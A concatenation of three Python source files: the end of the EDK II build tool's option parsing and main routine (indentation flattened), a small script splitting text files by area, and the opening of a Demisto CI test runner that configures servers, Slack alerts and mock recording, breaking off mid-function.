Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
help="Specify the specific option to parse EDK UNI file. Must be one of: [-c, -s]. -c is for EDK framework UNI file, and -s is for EDK UEFI UNI file. "\
"This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
"will override the setting in [BuildOptions] section of platform DSC.")
Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
Parser.add_option("--pcd", action="append", dest="OptionPcd", help="Set PCD value by command line. Format: \"PcdName=Value\" ")
Parser.add_option("-l", "--cmd-len", action="store", type="int", dest="CommandLength", help="Specify the maximum line length of build command. Default is 4096.")
(Opt, Args) = Parser.parse_args()
return (Opt, Args)
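# Illustrative usage (not part of the original tool; option values are hypothetical):
# the options parsed above correspond to command lines such as
#   build -n 4 -t GCC5 -D MY_FEATURE=TRUE -y BuildReport.txt -Y PCD -Y FLASH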
## Tool entrance method
#
# This method mainly dispatches to specific methods according to the command line options.
# If no error is found, a zero value is returned so that the caller of this tool
# can know whether it executed successfully or not.
#
# @retval 0 Tool was successful
# @retval 1 Tool failed
#
def Main():
StartTime = time.time()
# Initialize log system
EdkLogger.Initialize()
GlobalData.gCommand = sys.argv[1:]
#
# Parse the options and args
#
(Option, Target) = MyOptionParser()
GlobalData.gOptions = Option
GlobalData.gCaseInsensitive = Option.CaseInsensitive
# Set log level
if Option.verbose != None:
EdkLogger.SetLevel(EdkLogger.VERBOSE)
elif Option.quiet != None:
EdkLogger.SetLevel(EdkLogger.QUIET)
elif Option.debug != None:
EdkLogger.SetLevel(Option.debug + 1)
else:
EdkLogger.SetLevel(EdkLogger.INFO)
if Option.LogFile != None:
EdkLogger.SetLogFile(Option.LogFile)
if Option.WarningAsError == True:
EdkLogger.SetWarningAsError()
if platform.platform().find("Windows") >= 0:
GlobalData.gIsWindows = True
else:
GlobalData.gIsWindows = False
EdkLogger.quiet("Build environment: %s" % platform.platform())
EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
ReturnCode = 0
MyBuild = None
BuildError = True
try:
if len(Target) == 0:
Target = "all"
elif len(Target) >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
else:
Target = Target[0].lower()
if Target not in gSupportedTarget:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
ExtraData="Please select one of: %s" % (' '.join(gSupportedTarget)))
#
# Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
#
CheckEnvVariable()
GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
Workspace = os.getenv("WORKSPACE")
#
# Get files real name in workspace dir
#
GlobalData.gAllFiles = Utils.DirCache(Workspace)
WorkingDirectory = os.getcwd()
if not Option.ModuleFile:
FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
FileNum = len(FileList)
if FileNum >= 2:
EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
elif FileNum == 1:
Option.ModuleFile = NormFile(FileList[0], Workspace)
if Option.ModuleFile:
if os.path.isabs (Option.ModuleFile):
if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.PlatformFile != None:
if os.path.isabs (Option.PlatformFile):
if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
if Option.FdfFile != None:
if os.path.isabs (Option.FdfFile):
if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
Option.FdfFile = PathClass(Option.FdfFile, Workspace)
ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
if ErrorCode != 0:
EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
if Option.Flag != None and Option.Flag not in ['-c', '-s']:
EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
MyBuild = Build(Target, Workspace, Option)
GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
if not (MyBuild.LaunchPrebuildFlag and os.path.exists(MyBuild.PlatformBuildPath)):
MyBuild.Launch()
# Drop temp tables to avoid database locked.
for TmpTableName in TmpTableDict:
SqlCommand = """drop table IF EXISTS %s""" % TmpTableName
TmpTableDict[TmpTableName].execute(SqlCommand)
#MyBuild.DumpBuildData()
#
# All job done, no error found and no exception raised
#
BuildError = False
except FatalError, X:
if MyBuild != None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option != None and Option.debug != None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = X.args[0]
except Warning, X:
# error from Fdf parser
if MyBuild != None:
# for multi-thread build exits safely
MyBuild.Relinquish()
if Option != None and Option.debug != None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
else:
EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError=False)
ReturnCode = FORMAT_INVALID
except KeyboardInterrupt:
ReturnCode = ABORT_ERROR
if Option != None and Option.debug != None:
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
except:
if MyBuild != None:
# for multi-thread build exits safely
MyBuild.Relinquish()
# try to get the meta-file from the object causing exception
Tb = sys.exc_info()[-1]
MetaFile = GlobalData.gProcessingFile
while Tb != None:
if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
Tb = Tb.tb_next
EdkLogger.error(
"\nbuild",
CODE_ERROR,
"Unknown fatal error when processing [%s]" % MetaFile,
ExtraData="\n(Please send email to edk2-devel@lists.01.org for help, attaching following call stack trace!)\n",
RaiseError=False
)
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
ReturnCode = CODE_ERROR
finally:
Utils.Progressor.Abort()
Utils.ClearDuplicatedInf()
if ReturnCode == 0:
try:
MyBuild.LaunchPostbuild()
Conclusion = "Done"
except:
Conclusion = "Failed"
elif ReturnCode == ABORT_ERROR:
Conclusion = "Aborted"
else:
Conclusion = "Failed"
FinishTime = time.time()
BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
BuildDurationStr = ""
if BuildDuration.tm_yday > 1:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)" % (BuildDuration.tm_yday - 1)
else:
BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
if MyBuild != None:
if not BuildError:
MyBuild.BuildReport.GenerateReport(BuildDurationStr)
MyBuild.Db.Close()
EdkLogger.SetLevel(EdkLogger.QUIET)
EdkLogger.quiet("\n- %s -" % Conclusion)
EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
return ReturnCode
if __name__ == '__main__':
r = Main()
## 0-127 is a safe return range, and 1 is a standard default error
if r < 0 or r > 127: r = 1
sys.exit(r)
|
filter.py
|
import numpy as np
import os,re,sys
import threading
import goal_address
import linecache
np.random.seed(1337)
path='1.txt'
db = goal_address.connectdb2()
def file_name(file_dir):
    # Return the file names directly under file_dir (only the first level of os.walk).
    for root, dirs, files in os.walk(file_dir):
        return files
def process_line(line):
    # Each line is expected to be "<key> <v1> <v2> ...": a key token followed
    # by a space separated float vector.
    lineSpilt = line.split(' ', 1)
    # Strip ASCII and full-width punctuation from the key before validating it.
    str1 = r"[\s+\.\!\/_,$%^*(+\"\']+|[+——!,。?、~@#¥%……&*()]+"
    str2 = ""
    string = re.sub(str1, str2, lineSpilt[0])
    if string != '':
        # Parse the float vector and pad it with zeros up to length 100
        # (a plain list is used, since np.ndarray has no append()).
        goalLine = lineSpilt[1]
        tmp = [float(val) for val in goalLine.strip('\n').rstrip().split(' ')]
        tmp.extend([0.0] * max(0, 100 - len(tmp)))
        return tmp
    else:
        return False
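# Illustrative sketch (not part of the original script; the input format is an
# assumption inferred from process_line above).
def _process_line_example():
    sample = 'beijing 0.1 0.2 0.3\n'
    vector = process_line(sample)
    print(len(vector))  # the vector is zero-padded to 100 entries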
# Decide whether this entry still needs to be crawled:
# returns 1 when both the goal and verb checks pass, 0 for blank input
# (all other cases fall through and return None).
def check_exist(count):
    if count.strip() == '':
        return 0
    if goal_address.check_goal(count, db):
        if goal_address.check_verbs(count, db):
            return 1
def load(path):
    # Split one screen-content file into per-area files: each line starts with
    # an area key; the rest of the line is appended to
    # ../data_dividedby_area/<key>.txt, prefixed with the source file name.
    f = open("../screen_content/" + path)
    print(path)
    for line in f:
        words = line.split(' ', 1)
        f2 = open("../data_dividedby_area/" + words[0] + '.txt', 'a')
        now_str = path + '||| ' + words[1]
        f2.write(now_str)
        f2.close()
    f.close()
    # The source file is consumed once it has been processed.
    os.remove("../screen_content/" + path)
files=file_name("../screen_content/")
for file in files:
if(file!='.DS_Store'):
load(file)
        # t = threading.Thread(target=load, args=(file,), name=file)
# t.start()
# t.join()
|
test_content.py
|
from __future__ import print_function
import os
import re
import sys
import json
import time
import argparse
import threading
import subprocess
import traceback
from time import sleep
import datetime
from distutils.version import LooseVersion
import pytz
from google.cloud import storage
from google.api_core.exceptions import PreconditionFailed
from queue import Queue
from contextlib import contextmanager
import urllib3
import requests
import demisto_client.demisto_api
from slackclient import SlackClient
from Tests.mock_server import MITMProxy, AMIConnection
from Tests.test_integration import Docker, test_integration, disable_all_integrations
from Tests.test_dependencies import get_used_integrations, get_tests_allocation_for_threads
from demisto_sdk.commands.common.constants import RUN_ALL_TESTS_FORMAT, FILTER_CONF, PB_Status
from demisto_sdk.commands.common.tools import print_color, print_error, print_warning, \
LOG_COLORS, str2bool
# Disable insecure warnings
urllib3.disable_warnings()
SERVER_URL = "https://{}"
INTEGRATIONS_CONF = "./Tests/integrations_file.txt"
FAILED_MATCH_INSTANCE_MSG = "{} Failed to run.\n There are {} instances of {}, please select one of them by using " \
"the instance_name argument in conf.json. The options are:\n{}"
SERVICE_RESTART_TIMEOUT = 300
SERVICE_RESTART_POLLING_INTERVAL = 5
LOCKS_PATH = 'content-locks'
BUCKET_NAME = os.environ.get('GCS_ARTIFACTS_BUCKET')
CIRCLE_BUILD_NUM = os.environ.get('CIRCLE_BUILD_NUM')
WORKFLOW_ID = os.environ.get('CIRCLE_WORKFLOW_ID')
CIRCLE_STATUS_TOKEN = os.environ.get('CIRCLECI_STATUS_TOKEN')
SLACK_MEM_CHANNEL_ID = 'CM55V7J8K'
def options_handler():
parser = argparse.ArgumentParser(description='Utility for batch action on incidents')
parser.add_argument('-k', '--apiKey', help='The Demisto API key for the server', required=True)
parser.add_argument('-s', '--server', help='The server URL to connect to')
parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
parser.add_argument('-e', '--secret', help='Path to secret conf file')
parser.add_argument('-n', '--nightly', type=str2bool, help='Run nightly tests')
parser.add_argument('-t', '--slack', help='The token for slack', required=True)
parser.add_argument('-a', '--circleci', help='The token for circleci', required=True)
parser.add_argument('-b', '--buildNumber', help='The build number', required=True)
parser.add_argument('-g', '--buildName', help='The build name', required=True)
parser.add_argument('-i', '--isAMI', type=str2bool, help='is AMI build or not', default=False)
parser.add_argument('-m', '--memCheck', type=str2bool,
help='Should trigger memory checks or not. The slack channel to check the data is: '
'dmst_content_nightly_memory_data', default=False)
    parser.add_argument('-d', '--serverVersion', help='Which server version to run the '
                                                      'tests on (valid only when using AMI)', default="NonAMI")
    parser.add_argument('-l', '--testsList', help='List of specific, comma separated '
                                                  'tests to run')
options = parser.parse_args()
tests_settings = TestsSettings(options)
return tests_settings
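# Illustrative invocation (not part of the original script; all values are
# placeholders) showing the required arguments parsed above:
#   python test_content.py -k <API_KEY> -c ./Tests/conf.json -e ./Tests/secret_conf.json \
#       -t <SLACK_TOKEN> -a <CIRCLECI_TOKEN> -b 1234 -g "Demisto GA" -i true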
class TestsSettings:
def __init__(self, options):
self.api_key = options.apiKey
self.server = options.server
self.conf_path = options.conf
self.secret_conf_path = options.secret
self.nightly = options.nightly
self.slack = options.slack
self.circleci = options.circleci
self.buildNumber = options.buildNumber
self.buildName = options.buildName
self.isAMI = options.isAMI
self.memCheck = options.memCheck
self.serverVersion = options.serverVersion
self.serverNumericVersion = None
self.specific_tests_to_run = self.parse_tests_list_arg(options.testsList)
self.is_local_run = (self.server is not None)
@staticmethod
def parse_tests_list_arg(tests_list):
tests_to_run = tests_list.split(",") if tests_list else []
return tests_to_run
class PrintJob:
def __init__(self, message_to_print, print_function_to_execute, message_color=None):
self.print_function_to_execute = print_function_to_execute
self.message_to_print = message_to_print
self.message_color = message_color
def execute_print(self):
if self.message_color:
self.print_function_to_execute(self.message_to_print, self.message_color)
else:
self.print_function_to_execute(self.message_to_print)
class ParallelPrintsManager:
def __init__(self, number_of_threads):
self.threads_print_jobs = [[] for i in range(number_of_threads)]
self.print_lock = threading.Lock()
self.threads_last_update_times = [time.time() for i in range(number_of_threads)]
def should_update_thread_status(self, thread_index):
current_time = time.time()
thread_last_update = self.threads_last_update_times[thread_index]
return current_time - thread_last_update > 300
def add_print_job(self, message_to_print, print_function_to_execute, thread_index, message_color=None,
include_timestamp=False):
if include_timestamp:
message_to_print = f'[{datetime.datetime.now(datetime.timezone.utc)}] {message_to_print}'
print_job = PrintJob(message_to_print, print_function_to_execute, message_color=message_color)
self.threads_print_jobs[thread_index].append(print_job)
if self.should_update_thread_status(thread_index):
print("Thread {} is still running.".format(thread_index))
self.threads_last_update_times[thread_index] = time.time()
def execute_thread_prints(self, thread_index):
self.print_lock.acquire()
prints_to_execute = self.threads_print_jobs[thread_index]
for print_job in prints_to_execute:
print_job.execute_print()
self.print_lock.release()
self.threads_print_jobs[thread_index] = []
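# Illustrative sketch (not part of the original script): typical use of
# ParallelPrintsManager - messages are queued per thread and flushed in one
# locked batch so output from parallel threads does not interleave.
def _parallel_prints_manager_example():
    manager = ParallelPrintsManager(1)
    manager.add_print_job('collecting results', print, 0)
    manager.add_print_job('done', print, 0, include_timestamp=True)
    manager.execute_thread_prints(0)  # prints both queued messages under the lock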
class TestsDataKeeper:
def __init__(self):
self.succeeded_playbooks = []
self.failed_playbooks = []
self.skipped_tests = []
self.skipped_integrations = []
self.rerecorded_tests = []
self.empty_files = []
self.unmockable_integrations = {}
def add_tests_data(self, succeed_playbooks, failed_playbooks, skipped_tests, skipped_integration,
unmockable_integrations):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook in succeed_playbooks:
self.succeeded_playbooks.append(playbook)
for playbook in failed_playbooks:
self.failed_playbooks.append(playbook)
for playbook in skipped_tests:
self.skipped_tests.append(playbook)
for playbook in skipped_integration:
self.skipped_integrations.append(playbook)
for playbook_id, reason in unmockable_integrations.items():
self.unmockable_integrations[playbook_id] = reason
def add_proxy_related_test_data(self, proxy):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook_id in proxy.rerecorded_tests:
self.rerecorded_tests.append(playbook_id)
for playbook_id in proxy.empty_files:
self.empty_files.append(playbook_id)
def print_test_summary(tests_data_keeper, is_ami=True):
succeed_playbooks = tests_data_keeper.succeeded_playbooks
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_tests = tests_data_keeper.skipped_tests
unmocklable_integrations = tests_data_keeper.unmockable_integrations
skipped_integration = tests_data_keeper.skipped_integrations
rerecorded_tests = tests_data_keeper.rerecorded_tests
empty_files = tests_data_keeper.empty_files
succeed_count = len(succeed_playbooks)
failed_count = len(failed_playbooks)
skipped_count = len(skipped_tests)
rerecorded_count = len(rerecorded_tests) if is_ami else 0
empty_mocks_count = len(empty_files) if is_ami else 0
unmocklable_integrations_count = len(unmocklable_integrations)
print('\nTEST RESULTS:')
tested_playbooks_message = '\t Number of playbooks tested - ' + str(succeed_count + failed_count)
print(tested_playbooks_message)
succeeded_playbooks_message = '\t Number of succeeded tests - ' + str(succeed_count)
print_color(succeeded_playbooks_message, LOG_COLORS.GREEN)
if failed_count > 0:
failed_tests_message = '\t Number of failed tests - ' + str(failed_count) + ':'
print_error(failed_tests_message)
for playbook_id in failed_playbooks:
print_error('\t - ' + playbook_id)
if rerecorded_count > 0:
recording_warning = '\t Tests with failed playback and successful re-recording - ' + str(rerecorded_count) + ':'
print_warning(recording_warning)
for playbook_id in rerecorded_tests:
print_warning('\t - ' + playbook_id)
if empty_mocks_count > 0:
empty_mock_successes_msg = '\t Successful tests with empty mock files - ' + str(empty_mocks_count) + ':'
print(empty_mock_successes_msg)
        proxy_explanation = '\t (either there were no http requests or no traffic was passed through the proxy.\n' \
'\t Investigate the playbook and the integrations.\n' \
'\t If the integration has no http traffic, add to unmockable_integrations in conf.json)'
print(proxy_explanation)
for playbook_id in empty_files:
print('\t - ' + playbook_id)
if len(skipped_integration) > 0:
        skipped_integrations_warning = '\t Number of skipped integrations - ' + str(len(skipped_integration)) + ':'
print_warning(skipped_integrations_warning)
for playbook_id in skipped_integration:
print_warning('\t - ' + playbook_id)
if skipped_count > 0:
skipped_tests_warning = '\t Number of skipped tests - ' + str(skipped_count) + ':'
print_warning(skipped_tests_warning)
for playbook_id in skipped_tests:
print_warning('\t - ' + playbook_id)
if unmocklable_integrations_count > 0:
unmockable_warning = '\t Number of unmockable integrations - ' + str(unmocklable_integrations_count) + ':'
print_warning(unmockable_warning)
for playbook_id, reason in unmocklable_integrations.items():
print_warning('\t - ' + playbook_id + ' - ' + reason)
def update_test_msg(integrations, test_message):
if integrations:
integrations_names = [integration['name'] for integration in
integrations]
test_message = test_message + ' with integration(s): ' + ','.join(
integrations_names)
return test_message
def turn_off_telemetry(server, demisto_api_key):
"""
Turn off telemetry on the AMI instance
:param server: demisto server to connect to
:param demisto_api_key: api key to use for connection
:return: None
"""
client = demisto_client.configure(base_url=server, api_key=demisto_api_key, verify_ssl=False)
body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
path='/telemetry?status=notelemetry')
if status_code != 200:
print_error('Request to turn off telemetry failed with status code "{}"\n{}'.format(status_code, body))
sys.exit(1)
def reset_containers(server, demisto_api_key, prints_manager, thread_index):
prints_manager.add_print_job('Resetting containers', print, thread_index)
client = demisto_client.configure(base_url=server, api_key=demisto_api_key, verify_ssl=False)
body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
path='/containers/reset')
if status_code != 200:
error_msg = 'Request to reset containers failed with status code "{}"\n{}'.format(status_code, body)
prints_manager.add_print_job(error_msg, print_error, thread_index)
prints_manager.execute_thread_prints(thread_index)
sys.exit(1)
sleep(10)
def has_unmockable_integration(integrations, unmockable_integrations):
return list(set(x['name'] for x in integrations).intersection(unmockable_integrations.keys()))
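# Illustrative sketch (not part of the original script; integration names are
# hypothetical): has_unmockable_integration returns the test's integrations
# that also appear in the unmockable-integrations mapping.
def _has_unmockable_integration_example():
    integrations = [{'name': 'Slack'}, {'name': 'ExampleIntegration'}]
    unmockable = {'Slack': 'uses websockets'}
    assert has_unmockable_integration(integrations, unmockable) == ['Slack']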
def get_docker_limit():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.limit_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_processes_data():
process = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_memory_data():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.usage_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def send_slack_message(slack, channel, text, user_name, as_user):
    sc = SlackClient(slack)
    sc.api_call(
        "chat.postMessage",
        channel=channel,
        username=user_name,
        as_user=as_user,
        text=text,
        mrkdwn='true'
    )
def run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations, playbook_id,
succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
build_name, prints_manager, thread_index=0, is_mock_run=False):
with acquire_test_lock(integrations,
test_options.get('timeout'),
prints_manager,
thread_index,
tests_settings.conf_path) as lock:
if lock:
status, inc_id = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run, thread_index=thread_index)
# c.api_client.pool.close()
if status == PB_Status.COMPLETED:
prints_manager.add_print_job('PASS: {} succeed'.format(test_message), print_color, thread_index,
message_color=LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
elif status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
else:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
playbook_id_with_mock = playbook_id
if not is_mock_run:
playbook_id_with_mock += " (Mock Disabled)"
failed_playbooks.append(playbook_id_with_mock)
if not tests_settings.is_local_run:
notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name)
succeed = status in (PB_Status.COMPLETED, PB_Status.NOT_SUPPORTED_VERSION)
else:
tests_queue.put(conf_json_test_details)
succeed = False
return succeed
# run the test using a real instance, record traffic.
def run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=0):
proxy.set_tmp_folder()
proxy.start(playbook_id, record=True, thread_index=thread_index, prints_manager=prints_manager)
succeed = run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=thread_index, is_mock_run=True)
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
if succeed:
proxy.clean_mock_file(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
proxy.move_mock_file_to_repo(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
proxy.set_repo_folder()
return succeed
def mock_run(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
build_name, start_message, prints_manager, thread_index=0):
rerecord = False
if proxy.has_mock_file(playbook_id):
start_mock_message = '{} (Mock: Playback)'.format(start_message)
prints_manager.add_print_job(start_mock_message, print, thread_index, include_timestamp=True)
proxy.start(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
# run test
status, _ = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run=True, thread_index=thread_index)
# use results
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
if status == PB_Status.COMPLETED:
succeed_message = 'PASS: {} succeed'.format(test_message)
prints_manager.add_print_job(succeed_message, print_color, thread_index, LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.FAILED_DOCKER_TEST:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
failed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
mock_failed_message = "Test failed with mock, recording new mock file. (Mock: Recording)"
prints_manager.add_print_job(mock_failed_message, print, thread_index)
rerecord = True
else:
mock_recording_message = start_message + ' (Mock: Recording)'
prints_manager.add_print_job(mock_recording_message, print, thread_index, include_timestamp=True)
# Mock recording - no mock file or playback failure.
c = demisto_client.configure(base_url=c.api_client.configuration.host,
api_key=c.api_client.configuration.api_key, verify_ssl=False)
succeed = run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks,
integrations, playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci,
build_number, server_url, build_name, prints_manager, thread_index=thread_index)
if rerecord and succeed:
proxy.rerecorded_tests.append(playbook_id)
test_end_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(test_end_message, print, thread_index, include_timestamp=True)
def run_test(conf_json_test_details, tests_queue, tests_settings, demisto_api_key, proxy, failed_playbooks,
integrations, unmockable_integrations, playbook_id, succeed_playbooks, test_message, test_options,
slack, circle_ci, build_number, server_url, build_name, prints_manager, is_ami=True, thread_index=0):
start_message = f'------ Test {test_message} start ------'
client = demisto_client.configure(base_url=server_url, api_key=demisto_api_key, verify_ssl=False)
if not is_ami or (not integrations or has_unmockable_integration(integrations, unmockable_integrations)):
prints_manager.add_print_job(start_message + ' (Mock: Disabled)', print, thread_index, include_timestamp=True)
run_test_logic(conf_json_test_details, tests_queue, tests_settings, client, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=thread_index)
prints_manager.add_print_job('------ Test %s end ------\n' % (test_message,), print, thread_index,
include_timestamp=True)
return
mock_run(conf_json_test_details, tests_queue, tests_settings, client, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, start_message, prints_manager, thread_index=thread_index)
def http_request(url, params_dict=None):
try:
res = requests.request("GET",
url,
verify=True,
params=params_dict,
)
res.raise_for_status()
return res.json()
except Exception as e:
raise e
def get_user_name_from_circle(circleci_token, build_number):
url = "https://circleci.com/api/v1.1/project/github/demisto/content/{0}?circle-token={1}".format(build_number,
circleci_token)
res = http_request(url)
user_details = res.get('user', {})
return user_details.get('name', '')
def notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name):
circle_user_name = get_user_name_from_circle(circle_ci, build_number)
sc = SlackClient(slack)
user_id = retrieve_id(circle_user_name, sc)
text = "{0} - {1} Failed\n{2}".format(build_name, playbook_id, server_url) if inc_id == -1 \
else "{0} - {1} Failed\n{2}/#/WorkPlan/{3}".format(build_name, playbook_id, server_url, inc_id)
if user_id:
sc.api_call(
"chat.postMessage",
channel=user_id,
username="Content CircleCI",
as_user="False",
text=text
)
def retrieve_id(circle_user_name, sc):
user_id = ''
res = sc.api_call('users.list')
user_list = res.get('members', [])
for user in user_list:
profile = user.get('profile', {})
name = profile.get('real_name_normalized', '')
if name == circle_user_name:
user_id = user.get('id', '')
return user_id
def create_result_files(tests_data_keeper):
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_integration = tests_data_keeper.skipped_integrations
skipped_tests = tests_data_keeper.skipped_tests
with open("./Tests/failed_tests.txt", "w") as failed_tests_file:
failed_tests_file.write('\n'.join(failed_playbooks))
with open('./Tests/skipped_tests.txt', "w") as skipped_tests_file:
skipped_tests_file.write('\n'.join(skipped_tests))
with open('./Tests/skipped_integrations.txt', "w") as skipped_integrations_file:
skipped_integrations_file.write('\n'.join(skipped_integration))
def change_placeholders_to_values(placeholders_map, config_item):
"""Replaces placeholders in the object to their real values
Args:
placeholders_map: (dict)
Dict that holds the real values to be replaced for each placeholder.
config_item: (json object)
Integration configuration object.
Returns:
dict. json object with the real configuration.
"""
item_as_string = json.dumps(config_item)
for key, value in placeholders_map.items():
item_as_string = item_as_string.replace(key, value)
return json.loads(item_as_string)
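# Illustrative sketch (not part of the original script): expected behaviour of
# change_placeholders_to_values for the '%%SERVER_HOST%%' placeholder used
# elsewhere in this file; the config values are hypothetical.
def _change_placeholders_example():
    sample_config = {'params': {'url': 'https://%%SERVER_HOST%%:443'}}
    placeholders = {'%%SERVER_HOST%%': '1.2.3.4'}
    resolved = change_placeholders_to_values(placeholders, sample_config)
    assert resolved['params']['url'] == 'https://1.2.3.4:443'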
def set_integration_params(demisto_api_key, integrations, secret_params, instance_names, playbook_id,
prints_manager, placeholders_map, thread_index=0):
for integration in integrations:
integration_params = [change_placeholders_to_values(placeholders_map, item) for item
in secret_params if item['name'] == integration['name']]
if integration_params:
matched_integration_params = integration_params[0]
if len(integration_params) != 1:
found_matching_instance = False
for item in integration_params:
if item.get('instance_name', 'Not Found') in instance_names:
matched_integration_params = item
found_matching_instance = True
if not found_matching_instance:
optional_instance_names = [optional_integration.get('instance_name', 'None')
for optional_integration in integration_params]
error_msg = FAILED_MATCH_INSTANCE_MSG.format(playbook_id, len(integration_params),
integration['name'],
'\n'.join(optional_instance_names))
